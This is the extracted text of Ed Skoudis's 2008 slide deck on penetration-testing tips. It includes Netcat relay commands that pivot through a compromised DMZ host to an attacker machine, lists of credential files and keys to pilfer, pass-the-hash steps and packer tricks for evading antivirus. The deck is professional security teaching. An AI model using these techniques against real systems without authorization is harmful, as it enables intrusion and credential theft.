SlideShare a Scribd company logo
1 of 19
Download to read offline
Title: Secrets of America’s
         Top Pen Testers
   Subtitle: I Didn’t Come Up With That Title



                By Ed Skoudis

               Copyright 2008, All Rights Reserved
                          Version 4Q08

      Pen Test Secrets - ©2008, All Rights Reserved   1




                      Outline
•  Introduction
•  Recon-related tips
•  Scanning-related tips
•  Network-related tips
•  Password-related tips
•  Reporting-related tips
•  Conclusions
      Pen Test Secrets - ©2008, All Rights Reserved   2




                                                          1
Introduction and Goals
  •  Penetration testing is a growing field
  •  While there are standardized methodologies, many
     aspects of the penetration tester’s job involve art and
     improvisation
  •  The purpose of this presentation is to discuss some
     of the improvisation that our team has done in recent
     tests…
     –  So that you can directly use these concepts and techniques
        in your own testing regimen
     –  To give you a sense of what kinds of improvisation pen
        testers are often called on to do
     –  To solicit nifty ideas from you… I’ll show you mine if you
        show me yours

          Pen Test Secrets - ©2008, All Rights Reserved                3




            Over-Arching Theme
•  Pen testing isn’t all about zero-day exploits
  –  Don’t get me wrong… I love a good sploit as
     much as the next guy
•  Instead, it is often about using everyday
   tools and techniques in creative ways to try
   to find and exploit security flaws
  –  The overall goals of most penetration tests are…
      •  To identify vulnerabilities
      •  To determine the business risk posed by their exploit, and,
      •  To devise tactics and strategies for mitigation

          Pen Test Secrets - ©2008, All Rights Reserved                4




                                                                           2
About the Tips
•  Each tip covers a technique that has helped us:
  1) Save time, or…
  2) Pull off a hack we otherwise could not have
     accomplished, or…
  3) Have a bigger impact in helping the target organization
     recognize its risk and improve its security stance
  –  These are not mutually exclusive at all, given finite pen
     testing timeframes, scope, and resources
•  Also, each tip is associated with one or more
   meta-tips
  –  Tip: Here’s a technique we use to accomplish more
  –  Meta-tip: Here are the tools we use for each technique
        Pen Test Secrets - ©2008, All Rights Reserved            5




  Tip 1) Social Networking Sites
         Are Your Friends
 •  Social networking sites have exploded
    –  Especially among younger employees, more willing
       to share information about themselves
 •  A treasure-trove of information
    –  Employers, current and previous
    –  Technical skills, including product familiarity
    –  Relationships between people
    –  Interests, hobbies, likes, dislikes, etc.
 •  So, what can you do with these?

        Pen Test Secrets - ©2008, All Rights Reserved            6




                                                                     3
Tip 1) Using Social Networking
              Sites
•  During recon, use social networking sites to
   determine technologies in use
  –  At sites like LinkedIn, look at people’s stated skills and
     areas of expertise
•  Determine the relationship between people
  –  Useful in social engineering penetration tests
  –  Fred knows Mary… we can use that info to exploit them
•  From more personal social networking sites, look
   at the interests and passions of specific people,
   allowed for in the project scope
  –  What are their hobbies? Sports? Star Trek?
         Pen Test Secrets - ©2008, All Rights Reserved            7




Tip 1) Build Password Guessing
   and Cracking Dictionaries
 •  From social networking site pages associated with
    employees, build custom dictionaries for use in
    password guessing and cracking
 •  Grab appropriate profile pages, and save them into a
    directory, such as “profiles”
 •  Then, run:
    $ grep –h –r quot;quot; profiles | tr '[:space:]' 'n' | sort |
      uniq > wordlist.lst
 •  Trim the list to remove HTML cruft with stuff like:
    $ grep –v '<' wordlist.lst > newlist.lst
 •  Use that custom wordlist in THC Hydra for password
    guessing and John the Ripper for password cracking

         Pen Test Secrets - ©2008, All Rights Reserved            8




                                                                      4
Tip 2) Filtering a Scan in
                    Progress
                                                                         Testing
•  Scenario: Our team was conducting an
                                                                         Machine
   internal pen test of a financial services firm
    –  We were using a QualysGuard Scanner Appliance
       to scan large numbers of class-B sized networks
    –  Full scan would take many days
    –  2 days into scan, we noticed that the scan was
       crashing some backup servers when they were                       Bridging Firewall
       accessed on a specific TCP port
                                                                              Internal
         •  Let’s call it “Port X” because… ummm… there seems to be
            an undocumented, possibly exploitable, vulnerability there
                                                                              Network
    –  We paused the scan, of course
                                                                         ..
•  Our goal: Reconfigure the scan and start it
   again… Nice idea, right?

               Pen Test Secrets - ©2008, All Rights Reserved                                  9




       Tip 2) Transparent Bridging
                 Firewalls
•  Unfortunately, there appeared to be no Qualys function                  Testing
   for reconfiguring and restarting a scan
                                                                           Machine
•  We even called Qualys support to ask them if this was
   possible…
    –  They suggested that we stop, reconfigure, and start the
       scan again… from the beginning!
•  That would have been a huge waste of very expensive
   on-site time                                                           Bridging Firewall
•  Another problem: We were allowed to have only one
                                                                             Internal
   source IP address
    –  Altering it would have been a big problem – going through             Network
                                                                                      ..
       change control, etc.
                                                                          ..     ..
    –  Routing and NAT were also problematic
•  Solution: Deploy a dual home FreeBSD box, configured
   as a transparent, bridging firewall, filtering TCP Port X
               Pen Test Secrets - ©2008, All Rights Reserved                                 10




                                                                                                  5
Tip 3) Dealing with Very Large
                 Scans
    •  Scenario: We are often called upon to scan
       large numbers of machines
        –  Client: “Can you scan all 65,536 TCP and UDP
           ports on 10,000 machines?”
        –  “Oh, and we silently reject packets to closed
           ports.”
        –  With 1 second per port, that’s 1.3 billion seconds
        –  Us: “Yes, it’ll take 15,170 days, give or take.”
        –  That’s 41 years… check 100 ports in parallel? Still
           too much time… 5 months
    •  How can we go faster?
             Pen Test Secrets - ©2008, All Rights Reserved                     11




               Tip 3) Some Options
•  There are numerous approaches for dealing with very large
   scans
   1) Sample a subset of target machines – Limited – How representative is
      the sample?
   2) Sample target ports – Limited – What about non-standard ports and
      backdoor listeners?
   3) Lower time-outs on non-responsive ports – false negative possibilities
   4) Move closer to targets – more expensive, and doesn’t really lower
      time _that_ much
   5) Tweak firewall rules to send RESETs and ICMP Port Unreachable
      messages from closed ports – Ugh! Reconfig to measure behavior?
   6) Use hyper-fast port scanning methods (Kaminsky’s ScanRand with
      separate SYN sender and SYN-ACK receiver eliminating wait state) –
      TCP only, plus, watch out! You could DoS yourself!

             Pen Test Secrets - ©2008, All Rights Reserved                     12




                                                                                    6
Tip 3) An Approach We Use A
    Lot - Review Firewall Rules
  •  Review network firewall ruleset and measure
     only those ports that could reasonably make
     it through the firewall
          –  In effect, this is part configuration review and part
             port scan
          –  Overcomes the downsides of only sampling
             targets or sampling specific ports
             •  By sampling ports on a more intelligent basis
          –  Often a very effective approach, but doesn’t
             measure potential firewall bugs
             •  And requires more work from target organization personnel
             •  Also, doesn’t lend itself to a black-box approach

              Pen Test Secrets - ©2008, All Rights Reserved                              13




    Tip 4) More Flexible Pivoting
    with Netcat Gender Benders
•  Scenario: Suppose you have a penetration test like this:
                                                     DMZ
                                                     Linux
                                                      Box


                Internet                                      Target
  Pen
 Tester
                                                             Network
                                        Firewall
                                    Infrastructure
                                                                 Juicy Internal System

•  Suppose you get non-root shell on DMZ Linux box
•  Suppose also that you want to run Windows client software on your
   machine (psexec? fgdump? net use?) against juicy internal machine
•  We want really flexible pivoting – Pivot mercilessly during a pen test

              Pen Test Secrets - ©2008, All Rights Reserved                              14




                                                                                              7
Tip 4) In Other Words (or Picts)
                                                                                                    You’ve
                                             [user@linux ~]: $                                      got shell
You are                                              DMZ                                            here, but
here                                                 Linux                                          not UID 0
                                                      Box


                    Internet                                          Target
    Pen
   Tester
                                                                     Network
                                             Firewall
                                         Infrastructure
      Client that connects
                                                                                Juicy Internal System
      to TCP 445, such as “net use”
      fgdump, psexec, Metasploit, etc.
                                                                    Listening service
                                                                                               You want to
                                                                    on TCP 445
                                                                                               make SMB
                                                                                               connection
                                                                                               to here
                 Pen Test Secrets - ©2008, All Rights Reserved                                                  15




        Tip 4) The Answer? Nope…
   •  The answer is easy, you say…
   •  Just use a Netcat relay on the DMZ Linux Box
   $ mknod backpipe p
                                                                            DMZ Linux Box
   $ nc -nvlp 445 0<backpipe |
                                                           Listen
      nc -nv juicy.internal.system                                   Attacker
                                                          on TCP      shell
      445 | tee backpipe                                    445
                                                                                          Netcat
   •  Problem: You can’t                                                                 listener
                                                                                | pipe
      reconfigure iptables on
                                                                                                    backpipe
                                                                                         Netcat
      DMZ Linux box to allow                                                             client

      inbound 445                                                                             Connect to
            –  No UID 0 and rules of engagement may not allow                                  TCP 445




                 Pen Test Secrets - ©2008, All Rights Reserved                                                  16




                                                                                                                     8
Tip 4) A Better Answer…
         Netcat Gender Bender Relays
      •  Who says Netcat relays have                                  Connect to
                                                                                      Netcat
                                                                       TCP 80
         to be listener-to-client?                                                    client
                                                                      2                                         DMZ Linux
      •  What about client-to-client?                                       | pipe               backpipe2       System
                                                                                      Netcat
      •  What about listener-to-                                                      client      Connect to
         listener?                                                                                 TCP 445



                          Internet                                                      Target
        Pen
       Tester
                                                                                       Network
                               3
                                                         Firewall
                                                     Infrastructure
                  Listen
                                                                                                 Juicy Internal System
                               Netcat
                 on TCP
                   445        listener                                                Listening service
Attacker’s Own
                 1   | pipe                                                           on TCP 445
 Linux System                            backpipe1
                               Netcat
                 Listen
                 on TCP       listener
                   80


                     Pen Test Secrets - ©2008, All Rights Reserved                                                            17




                     Tip 4) The Commands
  •  On the Attacker’s own system, run
     a listener-to-listener relay                                        Listen
                                                                                       Netcat
                                                                        on TCP
  $ mknod backpipe1 p                                                     445         listener
                                                                                                               Attacker’s Own
                                                                             | pipe
  $ nc –nvlp 445 0<backpipe1 |                                                                   backpipe1      Linux System
                                                                                       Netcat                  (attacker.linux)
     nc –nvlp 80 | tee                                                 Listen
                                                                       on TCP         listener
     backpipe1                                                           80
  •  On the DMZ Linux system, run a
     client-to-client relay
  $ mknod backpipe2 p                                                 Connect to
                                                                                      Netcat
                                                                       TCP 80
  $ nc -nv                                                                            client                    DMZ Linux
     juicy.internal.system                                                  | pipe               backpipe2       System
     445 0<backpipe2 | nc –nv                                                         Netcat
     attacker.linux 80 | tee                                                          client      Connect to
                                                                                                   TCP 445
     backpipe2

                     Pen Test Secrets - ©2008, All Rights Reserved                                                            18




                                                                                                                                   9
Tip 4) Now, Run Any Windows
  Client App to Access Juicy Target
                                                                     Connect to
                                                                                    Netcat
                                                                      TCP 80
                                                                                    client
C:> net use * Linuxc$                                                                                   DMZ Linux
                                                                           | pipe            backpipe        System
C:> psexec Linux cmd.exe
                                                                                    Netcat
C:> fgdump –h Linux                                                                client    Connect to
                                                                                               TCP 445



                          Internet                                                    Target
        Pen
       Tester
                                                                                     Network
                                                        Firewall
                                                    Infrastructure
                  Listen
                                                                                             Juicy Internal System
                               Netcat
                 on TCP
                   445        listener                                              Listening service
Attacker’s Own
                     | pipe                                                         on TCP 445
 Linux System                            backpipe
                               Netcat
                                                                     Looks ugly? Yes, but, man,
                 Listen
                 on TCP       listener
                                                                     is it useful!
                   80



                    Pen Test Secrets - ©2008, All Rights Reserved                                                       19




          Tip 5) Local Pilfering Is Your
                     Friend
•  When you compromise a machine, pilfer its information
   resources as much as possible
      –  Verify that such pilfering is allowed in rules of engagement
•  What to grab?
      –  Password representations
            •  Unix/Linux: /etc/passwd and /etc/shadow or variants
            •  Windows: SAM database and cached credentials using fgdump, or at least
               currently logged on user’s credentials (using whosthere.exe…more on that later)
      –  Crypto keys
            •  SSH keys for ssh clients and sshd – public and private keys
            •  PGP and GnuPG keys – public and secret rings (check rules of engagement)
      –  RSA SecureID Authentication Manager server seed files (.asc) for
         tokens (Good idea, Bryce!)
            •  With these files, Cain can calculate tokens’ display at arbitrary points in the future

                    Pen Test Secrets - ©2008, All Rights Reserved                                                       20




                                                                                                                             10
Tip 5) Pilfering Continued
•  Additional items to snag:
   –  Source code
        •  Especially interesting for web servers… Locally, we can analyze it for
           vulnerabilities
   –  Wireless client profiles,
      including Pre-Shared Keys
        •  Detailed in Josh Wright’s
           December 2008 paper,
           “Vista Wireless Power Tools
           for the Penetration Tester”
           at www.inguardians.com
        •  PSK isn’t currently crackable,
           but can be directly imported
           into pen tester’s own system…
           Great idea, Josh!

                Pen Test Secrets - ©2008, All Rights Reserved                       21




          Tip 5) More Stuff to Pilfer
•  Machines with which the compromised system has recently
   communicated:
    –  Windows:
        C:> netstat –na
        C:> arp –a
        C:> ipconfig /displaydns
    –  Linux:
        # netstat –natu
        # arp –a
•  Additional system-specific information:
    –  DNS servers: Zone files
    –  Web servers: Document root, especially local scripts
    –  Mail servers: E-mail address inventory, address aliases, sample of e-mail
       that tester sent to it
    –  Clients: Inventory of software: c:> dir /s quot;c:Program Filesquot;
    –  Many more possibilities here
                Pen Test Secrets - ©2008, All Rights Reserved                       22




                                                                                         11
Tip 6) Optimizing John the
   Ripper
                                                                                 No SSE2
•  The John the Ripper
   password cracker can be
   compiled to use specific
                                                                                 No SSE2
   processor instruction sets
   to improve performance
    –  MMX, Streaming Single
       SIMD Extensions 2
                                                                                 SSE2
       (SSE2), 64-bit, PowerPC,
       etc.
•  Depending on the                                                              SSE2
   password algorithm, John
   may run two to five times
   faster when compiled
   using SSE2 on a modern
   Intel or AMD processor
$ make linux-x86-sse2

              Pen Test Secrets - ©2008, All Rights Reserved                                23




       Tip 6) But… I’m Too Late…
         john.rec is Your Friend
   •  I had a friend who was running John to crack some LANMAN (LM)
      passwords
   •  Cracking had been going for a day, with little success
   •  I asked if he had compiled John to use SSE2
   •  He said “no” and didn’t want to stop John, re-compile, and then restart
      John, because he’d be wasting a day of password cracking already
      done
   •  But, hit CTRL-C once in John, and it will create a john.rec file,
      containing its current state
   •  Re-compile John for SSE2 (but don’t overwrite John’s run directory!)
   •  Invoke John (now with SSE2) again… it’ll pick up where it left off
       –  Must invoke it with:
       $ ./john --restore
       –  Don’t specify a password file… it uses the last one, with all of the same
          settings!
   •  And, you now could be running 100 to 400 percent faster

              Pen Test Secrets - ©2008, All Rights Reserved                                24




                                                                                                12
Tip 7) Use John or Rainbow
                Tables?
•  Traditional password cracking cycle:                                  Guess
   –  Guess, encrypt/hash, compare, repeat
                                                                          Encrypt
   –  Continue until password is cracked
                                                                           Compare
•  Password cracking with Rainbow
   Tables:
   –  Hash/reduce to build many big chains,
      store only first and last password in chain                      Hash to Crack
                                                                                          Stored Chain I
                                                                   Reduction
   –  Crack by re-inflating chains                                                       Initial password
                                                                        Password A
                                                                                          End Password
                                                                Hash Function
   –  Not a mere lookup – need to regen chain                              Hash A
      to crack a hash                                                                     Stored Chain II
                                                                   Reduction
                                                                                         Initial password
   –  Uses Time-Memory Trade-off… twice                                  Password B
                                                                                          End Password
                                                                Hash Function
   –  Can crack some password                                              Hash B
                                                                                          Stored Chain III
      representations very fast (often <1 hr):                     Reduction
                                                                                         Initial password
                                                                        Password C
       •  LANMAN and some NT hashes                                                       End Password


              Pen Test Secrets - ©2008, All Rights Reserved                                                  25




                 Tip 7) John vs. RT:
                 Differences in Speed
  •  Generally, Rainbow Tables will crack a password faster than
     traditional password cracking
      –  Some Rainbow Tables can get nearly any LANMAN password within an
         hour
      –  But NOT ALWAYS…
          •  It depends on many variables: where the hash is located in the given chain where it is
             represented (near top or bottom), how long it takes to get a collision with the proper
             chain, etc.
  •  Leads to weird results:
      –  A “simple” password may take 1 hour to determine in Rainbow Tables
      –  But, that same password may take 1 second to determine with traditional
         password cracking (consider a variation of the username as a password)
  •  You may even see LANMAN hashes where the first 7 char piece
     cracks faster in Rainbow Tables and the second 7 char piece cracks
     faster with John…
      –  You’ll definitely see that if you take SANS Security 560
              Pen Test Secrets - ©2008, All Rights Reserved                                                  26




                                                                                                                  13
Tip 7) So, Which One?
                Answer: Both
•  For LANMAN and NT hashes, always run both
   Rainbow Table cracking and traditional password
   cracking
   –  Don’t choose one over the other
•  Same box?
   –  Ideally, use two different physical machines
   –  But, if two aren’t available, Rainbow Table tools usually
      will steal only a fraction of CPU horsepower from
      traditional password crackers, which suck up CPU a lot
   –  Thus, in a pinch, use one machine (dual core?) to run
      both tools… you will likely still get your answer more
      quickly
            Pen Test Secrets - ©2008, All Rights Reserved         27




 Tip 8) Optimizing Pass the Hash
•  Windows authentication to a domain or a server (LANMAN
   challenge/response, NTLMv1, NTLMv2) rely on the user’s
   hash, not the user’s password
•  Thus, we can steal the hashes, and use them to authenticate
•  Very powerful technique… works like a charm
•  But, that’s not the tip…
                               Steal
         Attacker Machine
                                    Hashes
                 1
       2   Place Hash
                                                   Target
               lsass.exe process
                                                   Machine
                     Logon
               Hash Session
                     Array
                                   Access Target
                         3
           Pen Test Secrets - ©2008, All Rights Reserved          28




                                                                       14
Tip 8) Optimizing Pass the Hash
  •  Pass-the-Hash Toolkit by Hernán Ochoa from Core
     Security
     –  Free at http://oss.coresecurity.com/projects/pshtoolkit.htm
  •  Modified SAMBA code from JoMo-kun of Foofus
     –  Free at http://www.foofus.net/jmk/passhash.html
  •  Both tools require both the LM and NT hashes as input
     –  But, what if you only have NT hashes?
  •  Why would you only have those?
     –  Perhaps the LM hashes got corrupted
     –  Perhaps your tool grabbed only NT hashes
     –  Perhaps the LM hashes weren’t there… passwords 15 or more
        characters don’t have a crackable LM hash
  •  So, are you doomed for pass the hash attacks?
            Pen Test Secrets - ©2008, All Rights Reserved             29




   Tip 8) Resolving the Dilemma:
      A Closer Look at PSHTK
•  Pass the Hash Toolkit (PSHTK)
   includes three parts:
   –  whosthere.exe: Dumps current
      user session information
      (including hashes) from lsass.exe
   –  genhash.exe: Generates LM and
      NT hash for given password
   –  iam.exe: Changes existing
      hashes in memory to chosen
      value
      •  Must provide it with username and
         domain name
      •  Those are needed for NTLMv2, but
         not LANMAN challenge/response or
         NTLMv1
      •  Still, you always give those to PSHTK

             Pen Test Secrets - ©2008, All Rights Reserved            30




                                                                           15
Tip 8) No Doom… Just Use LM
          Hash of Padding
•  Solution: If you have no LM hashes, in place of LM hash,
   enter the hash of padding
   –  Remember that old AAD3B4… for last 7 characters of a LM hash of
      password < 8 chars?
•  But, what if you don’t remember that hash of padding?
   –  Use genhash.exe to create hash of quot;quot;
   –  Then, use iam.exe like this:




             Pen Test Secrets - ©2008, All Rights Reserved                       31




    Tip 8) Getting Hashes… But I
          Don’t Have Admin!
•  To dump hashes, you need admin or SYSTEM privs, right?
•  Well, yes, to dump all hashes from the box
•  But, suppose you’ve exploited a process running as a non-admin
   account
    –  Browser exploit, SQL injection to invoke XP cmd shell on back-end database,
       etc.
•  Can you still get the hashes for that user and do pass the hash as that
   account?
•  Yes! Use whosthere.exe to get the hashes of the current user
•  Bring the hashes to any other Windows or Linux machine you’d like,
   with PSHTK or Foofus-modified SAMBA client
•  And then, pass the hash from that machine against targets
•  On the surface, whosthere.exe doesn’t seem that useful… until you
   really really need it!

             Pen Test Secrets - ©2008, All Rights Reserved                       32




                                                                                      16
Tip 9) Modifying Tools to
                     Dodge AV
•  Many very useful tools are detected by Anti-Virus solutions
    –  AV prevents them from being executed
    –  May also trigger alert and get the penetration tester noticed too
       early in the test
    –  Netcat, John, PSHTK items (genhash, iam, whosthere), etc.
•  How to evade AV tools?
    –  Shut them off… VERY DANGEROUS, and usually disallowed by
       Rules of Engagement or target system personnel
    –  Beware! The very useful fgdump temporarily disables AV tools
           •  According to fgdump helpfile, the –t option “…will test for presence of antivirus
              without actually running the password dumps”
           •  It’s not true! It does run the password dumps anyway
    –  Instead of shutting off AV tools, let’s modify executable so that it
       is far less likely to be detected, creating polymorphic equivalents

                  Pen Test Secrets - ©2008, All Rights Reserved                                   33




         Tip 9) Creating Polymorphic
           Equivalents to Dodge AV
•  Many tools for packing / altering executables to evade AV
•  LordPE by Yoda
    –  Good mods, but use Hex Editor to remove “LordPE” string near start of file to
       dodge AV
•  UPX by Markus F.X.J. Oberhumer, Laszlo Molnar, & John F. Reiser
    –  http://upx.sourceforge.net
    –  Nice mods, but many AV tools can detect most compression options…
    –  -1 compress faster… -9 compress better… Option -2 seems best to dodge AV
•  PE Scrambler by Nick Harbour
    –    First place winner of Race-to-Zero contest at Defcon 16
    –    Was available at www.rnicrosoft.net
    –    Recently taken down
    –    This kind of thing happens a lot with this kind of tool
•  You may want to write your own… or get to know one of the authors

                  Pen Test Secrets - ©2008, All Rights Reserved                                   34




                                                                                                       17
Tip 10) Reporting Effectively
•  Always write a report
  –  Even if you are on the in-house security team testing
     your own enterprise
•  Focus your report on the business implications
  –  How could a bad guy damage the enterprise given the
     vulnerabilities? Paint a picture in terms of business risk
  –  Why are these things the way they are?
  –  How can we change the practices that resulted in these
     flaws?
     •  Not just applying an individual patch – but improving the patching
        process
     •  Not just tweaking this or that aspect of an application, but improving
        the development process
          Pen Test Secrets - ©2008, All Rights Reserved                          35




   Tip 10) More About Reporting
  •  Provide enough detail about your
     methodology and findings so that a
     technically solid pen tester could replicate
     your work
  •  Provide an action plan based on time
     –  Not necessarily the same as that based on risk
     –  Which items should be accomplished immediately
        (say, within a week)
     –  Which should be done within a month, a quarter,
        a half, and a year?
     –  Gives your report usefulness over the longer span
          Pen Test Secrets - ©2008, All Rights Reserved                          36




                                                                                      18
Conclusions
 •  Penetration testing tools are becoming more powerful
    –  Tracking along with the attacks of actual bad guys
 •  We must keep up, so that we can determine business
    risks associated with vulnerabilities
 •  Get to know each tool in depth, realizing its limitations
    and working creatively to bypass them
 •  Don’t think of your tools as just point and shoot
 •  Think of each tool as a means to accomplish a (usually
    rather limited) goal
 •  Think flexibly about how to apply each of these tools
    together in a structured attack
 •  Relentlessly pivot (within scope)
 •  And, always remember: The penetration test doesn’t end
    when you get shell
    –  That’s when things just start to get interesting!
            Pen Test Secrets - ©2008, All Rights Reserved       37




              A Challenge For You
•  I write hacker challenges… Little
   puzzles for security personnel
   –  Over 25 in total at
      www.counterhack.net
•  Competitions to win prizes
•  The latest challenge is available
   for you at www.ethicalhacker.net
   –  It’s penetration test related
   –  You must come up with strategy and
      tactics to rescue Kris Kringle
•  “Santa Claus is Hacking To Town”
            Pen Test Secrets - ©2008, All Rights Reserved       38




                                                                     19

More Related Content

What's hot

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
VISUG - Approaches for application request throttling
VISUG - Approaches for application request throttlingVISUG - Approaches for application request throttling
VISUG - Approaches for application request throttlingMaarten Balliauw
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Honing headers for highly hardened highspeed hypertext
Honing headers for highly hardened highspeed hypertextHoning headers for highly hardened highspeed hypertext
Honing headers for highly hardened highspeed hypertextFastly
 
Video Fingerprinting and Applications: A Review
Video Fingerprinting and Applications: A ReviewVideo Fingerprinting and Applications: A Review
Video Fingerprinting and Applications: A ReviewJian Lu
 
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionStefano Di Paola
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portalsmsobiegraj
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Approaches to application request throttling
Approaches to application request throttlingApproaches to application request throttling
Approaches to application request throttlingMaarten Balliauw
 

What's hot (11)

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
VISUG - Approaches for application request throttling
VISUG - Approaches for application request throttlingVISUG - Approaches for application request throttling
VISUG - Approaches for application request throttling
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Honing headers for highly hardened highspeed hypertext
Honing headers for highly hardened highspeed hypertextHoning headers for highly hardened highspeed hypertext
Honing headers for highly hardened highspeed hypertext
 
Video Fingerprinting and Applications: A Review
Video Fingerprinting and Applications: A ReviewVideo Fingerprinting and Applications: A Review
Video Fingerprinting and Applications: A Review
 
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code Execution
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Confidence web
Confidence webConfidence web
Confidence web
 
Approaches to application request throttling
Approaches to application request throttlingApproaches to application request throttling
Approaches to application request throttling
 

Viewers also liked

Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writersamiable_indian
 
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-TellingNo Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Tellingamiable_indian
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art amiable_indian
 
Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commonsamiable_indian
 
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010A Human Factors Perspective on Alarm System Research & Development 2000 to 2010
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010Eric Shaver, PhD
 
Ceh v8 labs module 09 social engineering
Ceh v8 labs module 09 social engineeringCeh v8 labs module 09 social engineering
Ceh v8 labs module 09 social engineeringAsep Sopyan
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingAsep Sopyan
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Dark Arts Of Social Engineering
Dark Arts Of Social EngineeringDark Arts Of Social Engineering
Dark Arts Of Social EngineeringNutan Kumar Panda
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersAsep Sopyan
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsAsep Sopyan
 
Automating OWASP ZAP - DevCSecCon talk
Automating OWASP ZAP - DevCSecCon talk Automating OWASP ZAP - DevCSecCon talk
Automating OWASP ZAP - DevCSecCon talk Simon Bennetts
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 

Viewers also liked (20)

Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-TellingNo Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art
 
Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
 
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010A Human Factors Perspective on Alarm System Research & Development 2000 to 2010
A Human Factors Perspective on Alarm System Research & Development 2000 to 2010
 
Ceh v8 labs module 09 social engineering
Ceh v8 labs module 09 social engineeringCeh v8 labs module 09 social engineering
Ceh v8 labs module 09 social engineering
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijacking
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Dark Arts Of Social Engineering
Dark Arts Of Social EngineeringDark Arts Of Social Engineering
Dark Arts Of Social Engineering
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Browser exploit framework
Browser exploit frameworkBrowser exploit framework
Browser exploit framework
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
 
The Little Black Book of Scams
The Little Black Book of ScamsThe Little Black Book of Scams
The Little Black Book of Scams
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
 
Automating OWASP ZAP - DevCSecCon talk
Automating OWASP ZAP - DevCSecCon talk Automating OWASP ZAP - DevCSecCon talk
Automating OWASP ZAP - DevCSecCon talk
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
